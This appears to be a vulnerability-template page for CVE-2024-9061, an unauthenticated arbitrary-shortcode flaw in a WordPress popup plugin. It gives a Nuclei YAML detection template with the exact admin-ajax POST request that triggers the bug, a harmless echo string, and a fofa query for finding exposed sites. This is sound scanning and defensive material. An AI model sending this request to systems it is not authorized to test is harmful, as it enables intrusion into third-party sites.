WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution

ID: CVE-2024-9061

Severity: high

Author: s4e-io

Tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode

Description

The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

YAML Source

id: CVE-2024-9061

info:
  name: WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution
  author: s4e-io
  severity: high
  description: |
    The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9061
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve
    - https://github.com/RandomRobbieBF/CVE-2024-9061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-9061
    cwe-id: CWE-94
    epss-score: 0.00046
    epss-percentile: 0.18015
  metadata:
    max-request: 2
    verified: true
    vendor: themehunk
    product: wp-popup-builder
    framework: wordpress
    fofa-query: body="/wp-content/plugins/wp-popup-builder/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/wp-popup-builder")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31

    matchers:
      - type: dsl
        dsl:
          - 'len(body) == 13'
          - 'contains(body, "CVE-2024-9061")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a004830460221008e43701d88fd6a8ca3b08043d5139124c06b549a07bacbe082bcdc5c72e38033022100e51c38e4a095bce14b145a68cbddd1855072c1fb943ba2d5d081f583cbaa310f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9061.yaml"

View on Github